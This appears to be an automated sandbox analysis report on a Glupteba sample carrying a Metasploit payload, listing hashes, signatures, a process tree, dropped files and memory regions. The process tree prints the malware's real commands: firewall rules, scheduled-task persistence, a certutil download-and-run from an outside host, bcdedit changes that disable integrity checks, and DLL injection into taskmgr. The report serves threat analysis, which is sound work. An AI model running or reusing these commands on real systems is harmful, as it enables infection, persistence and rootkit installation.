Analysis

  • max time kernel
    0s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    22/01/2024, 17:10

General

  • Target

    6fd9d52463f7b9444ae84fccccc96a3b.exe

  • Size

    4.4MB

  • MD5

    6fd9d52463f7b9444ae84fccccc96a3b

  • SHA1

    d4fc7b50057f1e4df7527df00cde8a4b7556498d

  • SHA256

    7bec73f4ea2b19439f13212e476245d88a0cf3da3a90cb27d684614e0a5affef

  • SHA512

    f166b7030e21f2ca4db3c8d6fd030eb9ea85a9e9591a75fc1a22302cad87e2cc6c7880b0af19f1b292d157623f878f98af11283ec9a33d3d77ac517dd4f1e5e2

  • SSDEEP

    98304:pYjdJmh/+mi/Tlmp1pU7mGMDLGUvlm96nZnEV0nhktE22YRzwbW/z6RtwJ:47mhWmuwp1wMDyl6ZnEOhktEKRzr+/wJ

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 18 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies boot configuration data using bcdedit 1 TTPs 14 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
    "C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"
    1⤵
      PID:1668
      • C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
        "C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"
        2⤵
          PID:2624
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            3⤵
              PID:2588
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe ""
              3⤵
                PID:3000
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  4⤵
                  • Creates scheduled task(s)
                  PID:2692
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                  4⤵
                  • Creates scheduled task(s)
                  PID:376
                • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                  "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                  4⤵
                    PID:1868
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2872
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2900
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -timeout 0
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2868
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1424
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:792
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:604
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1756
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2628
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2220
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2228
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2332
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2540
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2152
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\Sysnative\bcdedit.exe /v
                    4⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1736
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    4⤵
                      PID:912
                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                      4⤵
                        PID:1968
                • C:\Windows\system32\makecab.exe
                  "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240122171030.log C:\Windows\Logs\CBS\CbsPersist_20240122171030.cab
                  1⤵
                    PID:2724
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                    1⤵
                    • Modifies Windows Firewall
                    PID:2632

                  Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

                          Filesize

                          64KB

                          MD5

                          c9b01a86e63bca4272d6629df216a696

                          SHA1

                          0c1a515ca60ca432e7163ec59e9cbb93d12cf84e

                          SHA256

                          12e7e556c8c534b4b9e3a772ec266e48b15f92461fb68d8c75a7bc062b21519d

                          SHA512

                          7872033f755cb77fd7d46a02b6424ce3deebc9163b4841dafbb0dc42ee5f4246ca574109bcd9c458bddeaab924b2dfc6d447ca3ea102eb86d040a76041188295

                        • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

                          Filesize

                          55KB

                          MD5

                          32fd525da503cb69f7f1629ee58d2e32

                          SHA1

                          fa3a87ed98b0e048a63fa59652c2d71f7f82187f

                          SHA256

                          239be51515c362328aefa4bef8dc4b0f16ada5d10bc41ced0a64093173d60be5

                          SHA512

                          5864560a9a9adec4b48eaa28edfbb2efd00eaa704fe5cc5c4b2431e718bf88f1e7d331756cc09e125bd07a4b4f3b32abbf847082c2867373369c72a9bbce51ff

                        • C:\Users\Admin\AppData\Local\Temp\Tar2119.tmp

                          Filesize

                          171KB

                          MD5

                          9c0c641c06238516f27941aa1166d427

                          SHA1

                          64cd549fb8cf014fcd9312aa7a5b023847b6c977

                          SHA256

                          4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

                          SHA512

                          936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

                        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

                          Filesize

                          94KB

                          MD5

                          d98e78fd57db58a11f880b45bb659767

                          SHA1

                          ab70c0d3bd9103c07632eeecee9f51d198ed0e76

                          SHA256

                          414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

                          SHA512

                          aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

                        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

                          Filesize

                          28KB

                          MD5

                          15294aac39d43bdadb3cbe422a656a77

                          SHA1

                          debb2fb31abff11aaf7ad03010c133628a345e70

                          SHA256

                          ec9a6e9b9f4933bebacb3eb8824f94f04024e09ac3e408614d48f301fef6cf8f

                          SHA512

                          dd2f31fa0039609068bc2b1086fc82944969d02f14d16d231a0aa06b9dae4dabc0414610541976c6e47d7d552664a024f51e096a08b04e708898d72743dfbde3

                        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

                          Filesize

                          163KB

                          MD5

                          cb70c7f3923cb7fe161c13e3465b7a5d

                          SHA1

                          f96d862b9d1a8f5779fcc9dba83b66988a8a5a55

                          SHA256

                          d157a3ad1f1e6a780830ca318f58e753c8dccc26d3f173f621b1bbd61c658ea6

                          SHA512

                          9fc5e05123db47c51571a93abafb84a80119a7d512416b94ed2190bc717617f89a54fc614db85f01b714686670969e800dc9cd8d0fff594130cf42a247ff7bdb

                        • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                          Filesize

                          64KB

                          MD5

                          03e03703fe5fc79e7f1d5e44e3c27b1e

                          SHA1

                          8f25ba10b5e479ae63c4c3867475502e1a6499fa

                          SHA256

                          504111bf8fb1386663a5f92bab46dc7b1171fb9c9a8b8cd100945a6c6bde311e

                          SHA512

                          1926c83c1f301800c289b16458ae30bc0927b231a5b11b12663d8a608c5ded27d8d73987ec6af46011e2f2b4e7e4c65fa7cfd50e5370d00e47784982874b88fa

                        • C:\Users\Admin\AppData\Local\Temp\osloader.exe

                          Filesize

                          39KB

                          MD5

                          435bdbda10a0eaeac0e7d33781be1837

                          SHA1

                          cdc07e5c82990eecb1f1de5f8d97ffe9cb908cdb

                          SHA256

                          9f0a2d4f0150f4c40d9a074e0bcd06d1db3e2bc5b5515e7783904d4b042450e4

                          SHA512

                          416990e39a3726596bd7dd3bb70cbc9b08c47bd48d2e621c70616cc09a1fc556b9d41eb325dcc54cee1a1fb8d2affcf1aa2032f50db3bbb6db6a7634d487de8c

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                          Filesize

                          65KB

                          MD5

                          ac05d27423a85adc1622c714f2cb6184

                          SHA1

                          b0fe2b1abddb97837ea0195be70ab2ff14d43198

                          SHA256

                          c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                          SHA512

                          6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

                          Filesize

                          893B

                          MD5

                          d4ae187b4574036c2d76b6df8a8c1a30

                          SHA1

                          b06f409fa14bab33cbaf4a37811b8740b624d9e5

                          SHA256

                          a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7

                          SHA512

                          1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

                          Filesize

                          1KB

                          MD5

                          a266bb7dcc38a562631361bbf61dd11b

                          SHA1

                          3b1efd3a66ea28b16697394703a72ca340a05bd5

                          SHA256

                          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                          SHA512

                          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                          Filesize

                          344B

                          MD5

                          44e942e56ad71912f4cdbdff8dbb983e

                          SHA1

                          2e3c9c018527b8e5f98e333d91bc26386c0dfc0e

                          SHA256

                          ccf4e6a578d687272a02dc32fba92e3c65e2b481974b9b8a3a0c3c03be8a0e14

                          SHA512

                          ea428a0dd1263ff64e9d6422ea632833cf67e064827a9438e217c4b1b2226789447a98bd6bf591ee929426a937bdfeb4c70eadbebf348afa265a39df9f89628f

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                          Filesize

                          344B

                          MD5

                          d562af68231088c295a5b09de3cbcb39

                          SHA1

                          5944cd71d6f21bae4a9319d1aa404689f37eccc9

                          SHA256

                          2cee86596ef577012a627e8dcade8ce31fb7629a26860e7b4a515d5448cfec2c

                          SHA512

                          8ac91cab45784733013c4689377d620a575c2f0862b78bf3cafe65d8f91ebab16483335ba7c620142055e812d62549b845c16038a14f9b35487f2dd76dd7649a

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                          Filesize

                          344B

                          MD5

                          0d1d181084a526819f4dc38f2c911737

                          SHA1

                          ccde1f0aab4c945b6877819a48a047b11b33f4e0

                          SHA256

                          ad66c0d0561f38e3022fdc7c6f6bf4192b2c21f95b9451dcb309523255a0de0c

                          SHA512

                          0d301c376d076ed7f69b4fc5e3c6841f4626ff347a811d69a657b22a042b45b65fdad17ec2ead2a774e8004f26ebcd24e822aed78614c2a37517a758433837cc

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

                          Filesize

                          242B

                          MD5

                          3c1815ec1c06f8acd9081d59420400a1

                          SHA1

                          f439cb394e9d3abc15d2ae48fc07eac858603a24

                          SHA256

                          acad7cb2cabbb86e6fa636522c9b8c979e30b0d8238f246412bf2a734cac5ea5

                          SHA512

                          d99669c8d2fa2a37cd50768db21b07cd1b4659dabf94e3956fb44c74d885f49139654bbdaba571c7f3154f79536b90607ba597c073652ec361aa9802ed7a3789

                        • C:\Windows\rss\csrss.exe

                          Filesize

                          634KB

                          MD5

                          5fc8eddd8c87b4be855b21f7015109c5

                          SHA1

                          1b2b802c289f770d16b4678d648630ee48f1384a

                          SHA256

                          530f26a68f4d28df80848c88bf421171a3b42f883e2f7adee89a2682b74d3ae1

                          SHA512

                          4431adb2d4fabdf349d94c82cb331cfe74a4498d6aec5955057a989c4f0320970da151d31422e7bd11d0c834ce46aaccdf3c0291005915d26392557475470cec

                        • C:\Windows\rss\csrss.exe

                          Filesize

                          852KB

                          MD5

                          b00ed00494ee57e6c52e15350a87642d

                          SHA1

                          670ea4ca841bb15c49c75a13f87dcab906a3523d

                          SHA256

                          b74e8efc5f5083292415fe25813ea0e32206b24f25003646ddbabb25a9c12114

                          SHA512

                          a8c9c8dd39bbf5c27d1f5f4895e3084c6a619a6243d09af56e12ffdc997b5c2783c670b88512f21c9bc61f01428473d4b15ac57870f6d3f88f431ac487c191b6

                        • C:\Windows\rss\csrss.exe

                          Filesize

                          301KB

                          MD5

                          8c3add78367cbbcfc0e469398610b0ab

                          SHA1

                          ee8b434d96bb2af3846fd18b46676113a942da92

                          SHA256

                          47656a063da9c5c670f02ae9e2ea77710e68408e041d3d1f58e7fb0f6491ec4e

                          SHA512

                          5d30d97d3a3213c0d1f83d5afe2b25e9a22cfd3653e6647eafc8749be13302dfb9ae00fb295bb272fd687ff8690de1676d673b1d51b201556058da7651b17334

                        • \Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

                          Filesize

                          17KB

                          MD5

                          034bccff31f9b5930b1a405d88bbc79e

                          SHA1

                          e9aaba0aa4e00562a2a68316109001274b844003

                          SHA256

                          fc26c36ff97f9a5d0d8a925c72cb963123d3013a69eab9086b40afeffa1fb622

                          SHA512

                          6994168753129e4a1a5d52d762fc2a5c1b041d013b9620f63f76198dc9bc927056c5b8d25ecdbb680e4a82cf9d6ed83de264223d365f898d57ae139a1c3208ab

                        • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

                          Filesize

                          215KB

                          MD5

                          2b3fb437d2aa195969805824a421e698

                          SHA1

                          191321a74c1c114180a249f8fb0f0001a0f40909

                          SHA256

                          2bc9e33c524cfd1d51589932721a0cec3fde6f09bb7939d4cd8cb17633b2eb9a

                          SHA512

                          bb98943cf012f04132c4f05b2f39a7260ad9ac4bedd44032970098a7e30fc101f5c188c136ea6c3c4c0feda62d42055885d5dbcfb047c5cd64687d14bf1cd546

                        • \Users\Admin\AppData\Local\Temp\dbghelp.dll

                          Filesize

                          77KB

                          MD5

                          ec95ca03114bfe923aac5eee16bf6a3f

                          SHA1

                          83e872e217104770876cba544b6a2c9a3c8f8455

                          SHA256

                          03173ddc1f16447a6f52e9a6858e952cec07bdcee4b922be071a837939af173e

                          SHA512

                          78ccc66935bd7451e2136cb960390ad961c8f08e125410b555bcf20357c71f466f94100803103d6d950062e27ef429569f1c588778d61120f532fe793246031c

                        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                          Filesize

                          140KB

                          MD5

                          9e283d09b2dfb3bbdad30ec5fda4d7fb

                          SHA1

                          fe357fab7abd3e938025bfe660ce704c34778251

                          SHA256

                          8f85a21bc4144c28f03499568f81ba153be9fdce158251d6d21bd4a6c37b2f8f

                          SHA512

                          54f149b392eaa4990f3b5809835583d60fc988da41c0c37941a442d1438dde4c8ce4e5ab99d7fca785a081c499d0090c7b3ff4d6e89712a9fb0b045e908062ae

                        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                          Filesize

                          157KB

                          MD5

                          924095796173147e9bcab57734f24b20

                          SHA1

                          0acedbff078dc3e7745dfa6088893364547f7721

                          SHA256

                          9de62ba25d6d333413ef942de6b23681d477e516f0d5bfecda89ef867bbe1e25

                          SHA512

                          c9cd8734df658ea571628c47262dba4a56a7ec8c15eeed5c26d9144a4b78a98e5ca67e49d3083f90e6c9672621e22017aa9746672ba3b574a5080d701a1d247b

                        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                          Filesize

                          110KB

                          MD5

                          76353b3230a8d5f0edb8236f39be76ac

                          SHA1

                          0366d61ae5400da73ee94e382c92ff4f0f6c0336

                          SHA256

                          8fee315c8e4a0116d4d17a6eda2481a6c7e4384a7f2e38dab8218d38d2390e84

                          SHA512

                          186a4a1948fd788b058631b57a548b769d5fb2bbfda0ac965b8fd9e0e788137d81ceed1dabb383f871c640c48a842e23b1c5c4e0b95e8be92e91826980276539

                        • \Users\Admin\AppData\Local\Temp\osloader.exe

                          Filesize

                          72KB

                          MD5

                          d97ea8f8b9f71bbbe784f5b118178a45

                          SHA1

                          823784b6701dcfdb65a933c181759993d8a114c1

                          SHA256

                          3bd5cbd6f7af5f903656bfd4b6c3a1a11d111480bf1ae58373df7b85705602d5

                          SHA512

                          9a9f67ca22bd9fa1b6ee60f0bf1d033aaeb71d3c85e2ead77e79d71e011a22ea26555177e69e1ba36a1cdf9e3eb9836d69590603c6947f716e46b87910f5d5ec

                        • \Users\Admin\AppData\Local\Temp\osloader.exe

                          Filesize

                          1KB

                          MD5

                          ba28e2a2f186d232d0cb8784041b65ae

                          SHA1

                          fdb5c6bd907e4990970c7fc6cd2d7a1d84e52e08

                          SHA256

                          4bde582e142fd8de63c022b2d8962998308fd6a5e459d0fedfc251464f4667df

                          SHA512

                          5c353cf7f00213c0c5a0d25fecaf56b76c1d61b39e0bc18275de216193c249e222fae6ac0e39ed1d9b47f4a33095ee9a57a7fc1a0d4acb9ea9246694f254f089

                        • \Users\Admin\AppData\Local\Temp\osloader.exe

                          Filesize

                          75KB

                          MD5

                          02e5f16910a4349358aed053b51a3bf1

                          SHA1

                          48caa92048187c8c45820c73d51d45cc21d2cf66

                          SHA256

                          51aa341ecd7d28e009494df17df0af56f66791ad9385b643a1680de2af6254b8

                          SHA512

                          c3e9b1d809492a65ad4fda034bc66fd189adc1ff114c953ddcb7f6b13286dc11a76ed83771d174ac847066c21480deffd9774e073e3e2c5de6fd5080732c546e

                        • \Users\Admin\AppData\Local\Temp\symsrv.dll

                          Filesize

                          157KB

                          MD5

                          55b3d29babe9a022063ce6037c67c02d

                          SHA1

                          9ef776ea47a1adccde9ad035f2d9b2689541236c

                          SHA256

                          d040c60cdb6702030b1168a1d3f50d3c19922b24625cf08aee60a23a83b3c267

                          SHA512

                          2b248881511c926a4366beb8e543f6a34408ea83611799ffd46ff42f23d53a609f3d8e43d528a473a9306e6363d5f98f7166004827c634c48d2a08b24096a7ae

                        • \Windows\rss\csrss.exe

                          Filesize

                          677KB

                          MD5

                          e0a64fe867395c4cee64c8c7feafd622

                          SHA1

                          bc4782ed2ffbeb6914965c5ee812002fdae05df9

                          SHA256

                          29e8d37ff092ff8453cf0b4ffd1d6534d3b3108ac4ddc4b4f81bd717489d98d7

                          SHA512

                          d03e328bbcb7913e2c137d33237bd8c375893f98bb92f8d9690d2540b7b56828a4c3b08632f027df8ffeab276f38239acd692e821830b1df5a13500218560836

                        • \Windows\rss\csrss.exe

                          Filesize

                          611KB

                          MD5

                          533126d85b3161ba22398edc770f92fa

                          SHA1

                          fc3c9c15bea72157b33bf10936dddd8c8195605a

                          SHA256

                          903bc1efcd6b200fc06d1f58630cb06a1564af04b75ebf7072a40a1c4fb48f44

                          SHA512

                          c094910ab8ecc773e88fe6cc888a0b48865768146212e4f42cc55182ad2ce1c594e8080609732ee7ca0ce117a88625d484589ba4e6dd79f7f74afa18867c504f

                        • memory/1668-6-0x00000000049F0000-0x0000000004E2C000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/1668-1-0x00000000049F0000-0x0000000004E2C000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/1668-2-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/1668-3-0x0000000004E30000-0x0000000005756000-memory.dmp

                          Filesize

                          9.1MB

                        • memory/1668-4-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/1668-0-0x00000000049F0000-0x0000000004E2C000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/1868-43-0x0000000140000000-0x00000001405E8000-memory.dmp

                          Filesize

                          5.9MB

                        • memory/1868-29-0x0000000140000000-0x00000001405E8000-memory.dmp

                          Filesize

                          5.9MB

                        • memory/2624-8-0x0000000004DB0000-0x00000000056D6000-memory.dmp

                          Filesize

                          9.1MB

                        • memory/2624-9-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/2624-20-0x0000000004970000-0x0000000004DAC000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2624-7-0x0000000004970000-0x0000000004DAC000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2624-18-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/2624-5-0x0000000004970000-0x0000000004DAC000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/3000-21-0x0000000004990000-0x0000000004DCC000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/3000-345-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-19-0x0000000004990000-0x0000000004DCC000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/3000-258-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-263-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-314-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-260-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-259-0x0000000004990000-0x0000000004DCC000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/3000-344-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-22-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-346-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-371-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-372-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-373-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-374-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-375-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-376-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-377-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-378-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB